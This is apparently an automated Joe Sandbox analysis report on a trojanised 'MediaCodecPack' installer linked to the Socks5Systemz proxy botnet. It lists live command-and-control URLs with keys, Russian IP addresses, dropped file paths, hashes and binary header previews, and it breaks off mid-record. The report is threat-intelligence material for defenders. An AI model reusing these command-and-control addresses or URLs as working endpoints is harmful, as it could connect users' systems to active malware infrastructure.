https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.dr | false | - | high
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325 | mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/04 | mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/psU | newwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.dr | false | - | high
https://188.119.66.185/priseCertificates | mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | newwork.exe.1.exe | false | - | high
https://188.119.66.185/rosoft | mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://188.119.66.185/ | mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline | newwork.exe.1.exe | false | - | high
https://188.119.66.185/405117-2476756634-1002W= | mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://wonderwork.ucoz.com/ | newwork.exe.1.tmp, 00000001.00000002.3557131784.00000000059AC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000000.1708971445.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.2.dr, mediacodecpack.exe.1.dr, is-F43ND.tmp.1.dr | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4 | mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3555972784.000000000092E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.remobjects.com/ps | newwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.dr | false | - | high
https://www.easycutstudio.com/support.html | newwork.exe.1.exe, 00000000.00000003.1696268555.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000002.3556231844.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696174472.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1698014219.0000000003100000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.3556862399.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1698150930.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.3556348257.0000000000619000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://188.119.66.185/allowedCert_OS_1 | mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.225.74 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
188.119.66.185 | unknown | Russian Federation | 209499 | FLYNETRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577462
Start date and time: 2024-12-18 13:56:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: newwork.exe.1.exe
Detection: MAL
Classification: mal96.troj.evad.winEXE@5/26@0/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 192
• Number of non-executed functions: 269
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: newwork.exe.1.exe
                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name
46.8.225.74 | steel.exe.3.exe | malicious | Socks5Systemz
46.8.225.74 | AbC0LBkVhr.exe | malicious | Socks5Systemz
46.8.225.74 | KRdh0OaXqH.exe | malicious | Petite Virus, Socks5Systemz
46.8.225.74 | AGcC2uK0El.exe | malicious | Petite Virus, Socks5Systemz
46.8.225.74 | 6hvZpn91O8.exe | malicious | Petite Virus, Socks5Systemz
46.8.225.74 | j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz
188.119.66.185 | stail.exe.3.exe | malicious | Socks5Systemz
188.119.66.185 | steel.exe.3.exe | malicious | Socks5Systemz
188.119.66.185 | steel.exe.3.exe | malicious | Socks5Systemz
188.119.66.185 | Oz2UhFBTHy.exe | malicious | Socks5Systemz
188.119.66.185 | GEm3o8pION.exe | malicious | Socks5Systemz
188.119.66.185 | GEm3o8pION.exe | malicious | Socks5Systemz
188.119.66.185 | bzX2pV3Ybw.exe | malicious | Socks5Systemz
188.119.66.185 | bzX2pV3Ybw.exe | malicious | Socks5Systemz
188.119.66.185 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
                                                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | steel.exe.3.exe | malicious | Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | AbC0LBkVhr.exe | malicious | Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | KRdh0OaXqH.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | AGcC2uK0El.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | 6hvZpn91O8.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | j9htknb7BQ.exe | malicious | Petite Virus, Socks5Systemz | 46.8.225.74
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | b3astmode.arm5.elf | malicious | Mirai | 109.248.108.147
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | reduce.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | InsertSr.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | iKhdG3bwZK.exe | malicious | GO Backdoor | 46.8.236.61
FLYNETRU | stail.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | Oz2UhFBTHy.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name | Context
51c64c77e60f3980eea90869b68c58a8 | stail.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | cd#U9988.exe | malicious | Unknown | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | Oz2UhFBTHy.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\MediaCodecPack\sqlite3.dll | stail.exe.3.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | steel.exe.3.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | steel.exe.3.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | AbC0LBkVhr.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | Oz2UhFBTHy.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | GEm3o8pION.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | GEm3o8pION.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | bzX2pV3Ybw.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | bzX2pV3Ybw.exe | malicious | Socks5Systemz
Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3193465
Entropy (8bit): 6.245419881846555
Encrypted: false
SSDEEP: 49152:IG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:B1VWIkOISM89ra7Xq1WkW4rJ
MD5: 49FC2D4BA26F2EEF94CCC6B71EB0AD96
SHA1: BC2B35A763A9B6EF1CDB599FE1AD5933B528E9E0
SHA-256: FD66C66EF0DAD6BAA7DE9CFA8CD552D8D44DFB09531110EF3CE9D7B851BB5E0B
SHA-512: 73A58CB7F609F1BD049EEDDA9D295D07437E35D2D17ACC6C5D4A774710A50C134770031800033A943898E6848358DBC573168CBC199DF4848F46CDD7C5936BD3
Malicious: true
Yara Hits:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                                                                                      Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):645592
                                                                                      Entropy (8bit):6.50414583238337
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: stail.exe.3.exe, Detection: malicious, Browse
                                                                                      • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                      • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                      • Filename: AbC0LBkVhr.exe, Detection: malicious, Browse
                                                                                      • Filename: Oz2UhFBTHy.exe, Detection: malicious, Browse
                                                                                      • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                      • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                      • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                                      • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                      Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      File Type:ISO-8859 text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8
                                                                                      Entropy (8bit):2.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Gllln:G/l
                                                                                      MD5:1BA912D0AF3D27F7DAF293E886D0A941
                                                                                      SHA1:868BD880A8471BB99CA942E602846D2A0F6E66B1
                                                                                      SHA-256:635D4A628D1CFB24E09AA2EA3437B51E8504191A394481710FB0D3E35783343C
                                                                                      SHA-512:359B15A505EB1A1848B8D3A9571F7A4632D1CEF46B97F8202069A91F37AD9A58B608421B62286069F9AFB738AC205B610A04FE889DE14BF95A07C2B5A53F258F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..bg....
                                                                                      Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.8112781244591328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:M:M
                                                                                      MD5:4352D88A78AA39750BF70CD6F27BCAA5
                                                                                      SHA1:3C585604E87F855973731FEA83E21FAB9392D2FC
                                                                                      SHA-256:67ABDD721024F0FF4E0B3F4C2FC13BC5BAD42D0B7851D456D88D203D15AAA450
                                                                                      SHA-512:EDF92E3D4F80FC47D948EA2F17B9BFC742D34E2E785A7A4927F3E261E8BD9D400B648BFF2123B8396D24FB28F5869979E08D58B4B5D156E640344A2C0A54675D
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:....
                                                                                      Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):128
                                                                                      Entropy (8bit):2.9012093522336393
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                                      MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                                      SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                                      SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                                      SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                                      Malicious:false
                                                                                      Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1645320
                                                                                      Entropy (8bit):6.787752063353702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1645320
                                                                                      Entropy (8bit):6.787752063353702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):645592
                                                                                      Entropy (8bit):6.50414583238337
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):78183
                                                                                      Entropy (8bit):7.692742945771669
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                      Malicious:false
                                                                                      Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3193465
                                                                                      Entropy (8bit):6.245419443726979
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:vG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:O1VWIkOISM89ra7Xq1WkW4rJ
                                                                                      MD5:E9385FAE29EC4352F30C9140C9844332
                                                                                      SHA1:1BB2B802B8AD1324638E96199FF60648918BA8CB
                                                                                      SHA-256:47F7DE0DD6E931B6D8200B4CF675082C77F01861784A3E3358F8A0657F4430BA
                                                                                      SHA-512:B3ADCF8AB4C658AC246772B151B7C2762A64BA40C00EF207493EC72CB15414DF08EC6774D4A1D064F00E93BCED9D174466C5B247E4795D81D27304C5924F80CA
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-F43ND.tmp, Author: Joe Security
                                                                                      Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.....m.0.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4...@......y>...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499712
                                                                                      Entropy (8bit):6.414789978441117
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):348160
                                                                                      Entropy (8bit):6.542655141037356
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):176128
